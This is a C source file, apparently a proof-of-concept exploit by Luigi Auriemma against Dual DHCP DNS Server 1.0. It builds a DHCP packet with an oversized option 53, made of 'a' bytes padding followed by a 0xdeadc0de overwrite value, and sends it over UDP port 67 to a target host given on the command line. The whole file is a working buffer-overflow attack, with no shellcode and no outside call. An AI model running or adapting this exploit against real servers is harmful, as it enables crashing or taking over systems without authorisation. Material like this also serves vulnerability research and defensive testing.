/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    67
#define OPTBOF  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "\xde\xc0\xad\xde"



u_int resolv(char *host);
void std_err(void);



#pragma pack(1)
typedef struct {
    u_char  msg_type;
    u_char  hw_type;
    u_char  addr_len;
    u_char  hops;
    u_int   trans_id;
    u_short secs;
    u_short bootp_flag;
    u_int   client_ip;
    u_int   your_ip;
    u_int   server_ip;
    u_int   relay_ip;
    u_char  mac[16];
    u_char  server_name[64];
    u_char  boot_file[128];
    u_int   magic;
} dhcpmsg;

typedef struct {
    u_char  code;
    u_char  len;
    u_char  data[];
} dhcpopt;
#pragma pack()



int main(int argc, char *argv[]) {
    dhcpmsg *msg;
    dhcpopt *opt;
    struct  sockaddr_in peer;
    int     sd,
            i,
            seed,
            len,
            on = 1;
    u_char  buff[512];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Dual DHCP DNS Server 1.0 buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host>\n"
            "\n", argv[0]);
        exit(1);
    }

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    seed = ~time(NULL);

    msg             = (dhcpmsg *)buff;
    msg->msg_type   = 1;
    msg->hw_type    = 1;
    msg->addr_len   = 6;
    msg->hops       = 0;
    msg->trans_id   = seed;
    msg->secs       = 0;
    msg->bootp_flag = 0;
    msg->client_ip  = 0;
    msg->your_ip    = 0;
    msg->server_ip  = 0;
    msg->relay_ip   = 0;
    memset(msg->mac, 0, sizeof(msg->mac));
    for(i = 0; i < 6; i++) {        // random
        seed = (seed * 0x343FD) + 0x269EC3;
        msg->mac[i] = seed;
    }
    strncpy(msg->server_name, "", sizeof(msg->server_name));
    strncpy(msg->boot_file,   "", sizeof(msg->boot_file));
    msg->magic      = 0x63538263;   // "OK"

    opt             = (dhcpopt *)((u_char *)msg + sizeof(dhcpmsg));
    opt->code       = 53;
    opt->len        = sizeof(OPTBOF) - 1;
    memcpy(opt->data, OPTBOF, opt->len);

    opt             = (dhcpopt *)((u_char *)opt + sizeof(dhcpopt) + opt->len);
    opt->code       = 0xff;         // end option
    opt->len        = 0;

    len = (u_char *)opt + sizeof(dhcpopt) - buff;

    printf("- send BOF packet\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
    if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    close(sd);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


